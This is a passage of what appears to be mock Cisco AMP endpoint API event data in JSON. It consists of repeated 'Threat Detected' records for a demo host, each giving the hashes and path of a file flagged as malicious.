Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163578","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163577","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163576","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163575","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163574","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163572","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163571","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163570","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163568","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":83000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163566","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163565","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163564","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":20000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163563","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":833000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196265","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":818000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196264","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196263","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":693000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":630000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 